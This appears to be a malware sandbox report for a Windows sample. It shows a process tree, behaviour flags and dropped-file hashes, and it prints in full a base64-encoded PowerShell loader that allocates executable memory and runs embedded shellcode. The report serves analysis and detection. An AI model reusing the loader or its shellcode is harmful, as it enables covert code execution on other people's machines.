DsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AGQALAAwAHgANAA0ACwAMAB4ADAANQAsADAAeAA3ADQALAAwAHgANQBlACwAMAB4ADkANAAsADAAeAAwADEALAAwAHgAMABmACwAMAB4ADIAZAAsADAAeABhADYALAAwAHgAOABlACwAMAB4AGIAYgAsADAAeABiADkALAAwAHgAOABhACwAMAB4ADQANwAsADAAeAA2ADUALAAwAHgAMwBkACwAMAB4AGUAYwAsADAAeAA3AGQALAAwAHgAZAAxACwAMAB4AGQAMQAsADAAeAAxADMALAAwAHgANwBlACwAMAB4ADIAMQAsADAAeABmAGIALAAwAHgAZAA3ACwAMAB4ADIAYQAsADAAeAA3ADEALAAwAHgAOQAzACwAMAB4AGYAZQAsADAAeAA1ADIALAAwAHgAMQBhACwAMAB4ADYAMwAsADAAeABmAGUALAAwAHgAOAA2ACwAMAB4ADgAYwAsADAAeAAzADMALAAwAHgANQAwACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAAyADkALAAwAHgAMAA0ACwAMAB4AGUAZQAsADAAeAA5AGUALAAwAHgAMQA2ACwAMAB4ADMANAAsADAAeAAxADEALAAwAHgANwA1ACwAMAB4ADMAZgAsADAAeAA1AGMALAAwAHgAZQA1ACwAMAB4ADcANgAsADAAeAA0ADAALAAwAHgAOQBjACwAMAB4ADgAZQAsADAAeAAxADMALAAwAHgAMwAzACwAMAB4AGUAOAAsADAAeAAwADMALAAwAHgAYgA5ACwAMAB4ADkAZAAsADAAeAA3ADMALAAwAHgAYgAzACwAMAB4ADIAYwAsADAAeABlADIALAAwAHgAMQBiACwAMAB4AGUAMgAsADAAeAA4ADcALAAwAHgAZAA2ACwAMAB4ADUAYgAsADAAeAAwAGIALAAwAHgAMAAyACwAMAB4ADkAZAAsADAAeAAxAGIALAAwAHgAZQA4ACwAMAB4AGMANwAsADAAeABhADgALAAwAHgAYwBiACwAMAB4ADcAOAAsADAAeAAxAGEALAAwAHgAYQBkACwAMAB4AGUAYgAsADAAeAAyADgALAAwAHgAOQAzACwAMAB4ADQAYgAsADAAeAA4ADEALAAwAHgAZAA4ACwAMAB4AGYANQAsADAAeABjADQALAAwAHgAMwBkACwAMAB4ADQAMAAsADAAeAA1AGMALAAwAHgAOQBlACwAMAB4AGQAYwAsADAAeAA4AGQALAAwAHgANABhACwAMAB4AGQAYQAsADAAeABkAGUALAAwAHgAMAA2ACwAMAB4ADcAOQAsADAAeAAxAGEALAAwAHgAOQAwACwAMAB4AGUAZQAsADAAeABmADQALAAwAHgAMAA4ACwAMAB4ADQANAAsADAAeAAxAGYALAAwAHgANAAzACwAMAB4ADcAMgAsADAAeABjADIALAAwAHgAMgAwACwAMAB4ADcAOQAsADAAeAAxADkALAAwAHgAZQBhACwAMAB4AGIANAAsADAAeAA4ADYALAAwAHgAOAA4ACwAMAB4AGIAZAAsADAAeAAyADAALAAwAHgAOAA1ACwAMAB4AGUAZAAsADAAeAA4ADkALAAwAHgAZQBlACwAMAB4ADcANgAsADAAeABkADgALAAwAHgAOAAyACwAMAB4ADIANwAsADAAeABlADMALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0ADcALAAwAHgAZQAzACwAMAB4ADIAMwAsADAAeABmAGMALAAwAHgAMQAxACwAMAB4ADYAOQAsADAAeAAyADQALAAwAHgAOQA0ACwAMAB4AGMANQAsADAAeABjADkALAAwAHgANwA3ACwAMAB4ADgAMQAsADAAeAAwADkALAAwAHgAYwA0ACwAMAB4AGUAYgAsADAAeAAxAGEALAAwAHgAOQBjACwAMAB4AGUANwAsADAAeAA1AGQALAAwAHgAYwBmACwAMAB4ADMANwAsADAAeAA4ADAALAAwAHgANgAzACwAMAB4ADMANgAsADAAeAA3AGYALAAwAHgAMABmACwAMAB4ADkAYgAsADAAeAAxAGQALAAwAHgAOAAxACwAMAB4ADcAMwAsADAAeAA0AGEALAAwAHgANQBiACwAMAB4AGYANwAsADAAeAA5AGQALAAwAHgANABlADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABGAGUAUwBOAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABGAGUAUwBOAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABGAGUAUwBOACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnlr-kac.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES38DD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC38DC.tmp"6⤵PID:2660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bc429cab527bdae7fea6482775b95391
SHA13baab5115b94f7d9c065440200464e6af2a84f91
SHA2565d0162a806205e8661c9fd72a99c3b48af55c0db129c2533cb968daeb9a7948a
SHA51273bff415e35c1bb42b02897a5ee983922fb66f103e53c381cf3874bf088a35b5a29ad772a297fda4b25453f2025888b89f5fb21645c2d3bc26a05417b00c54fb
-
Filesize
3KB
MD58ae45b56a4d40070bff2a57010ca829f
SHA107924b4f6fb54b3105d3dfb429bf482cd6609e5a
SHA25647d84ae418a90f4120511e78492b0477f1085fc18b7419c63edccaec5ce9625a
SHA512159033634a196cda3df156cc11b52b633610b2a5b2cb753a18728485972afaa6a05ff2c9383112e001ae8cdb9d8ff0fa3282bb44308134f8baaf812dc21a3170
-
Filesize
7KB
MD580deabb48aef123c006aebcafef01f8d
SHA1ec14a45d86c617b7cb8974c467205265c35d462f
SHA256e0cf193162ff37f68e42fdc67ef7eac0ab7f1741ee42d308dafd4f1bda33ecad
SHA5126702e163435ee4561c9c32a4c52be897ab3f0db59659f24bc9fb06d222757c3f14f0e3f3f61be77078a0bdc7270aed7450459794a68d13b89e1dfb8826230dff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5b6871bb612b0350b771280f6c95b4902
SHA168281830cae5ee715ba3d85f46c67db1621f5dcb
SHA256f5e80d286d077ea62a999e9395b5eb49a3b4fe519100b5db8e2a647b75dabc70
SHA512096393da0d01cb09e77f196fef9769f1bc7f4618e4c2dfccc7e634e57939df08abb01e04340a99faac7e0b14dd9fa949d54c3a63079c6120aefe59be9fd8e010
-
Filesize
652B
MD5f80729650f8f0526c3c5e6c891efee75
SHA1656d8a58d3bf4ad9298f3bc74097a890dc0bf43e
SHA25649f6513126f0a42d8152ccf1e58b62c35bcd5c11e6cb58fc07fd8075d4ec1467
SHA51275df3c9dcf5895b49092d61de08ecb938961407dc347df86ba05f4b5d43c0223f0c16ad050871d2e6891a1a67b1f551b2e93c0fe8bc47e556af1ef2b7ec2cfac
-
Filesize
557B
MD57319070c34daa5f6f2ece2dfc07119ee
SHA1f26a4a48518a5608e93c8b77368f588b0433973c
SHA256b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc
SHA51234169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd
-
Filesize
309B
MD5ac79210adb489947c774aa90662ba787
SHA190c90291919bcceb605acc62c9319d720580cac4
SHA25683ebaec4c4d3cdc7e55736c5958dbec7aeb4da365a4d96a29564d83f55290afb
SHA512e304e7afaccdd35510a1636403a64832e164072aa2938650e97c9c70189d13ae7245f8f12e736d5fe59e63bf58d69bb8aeb2f2c00a24d173011029e83c2355bb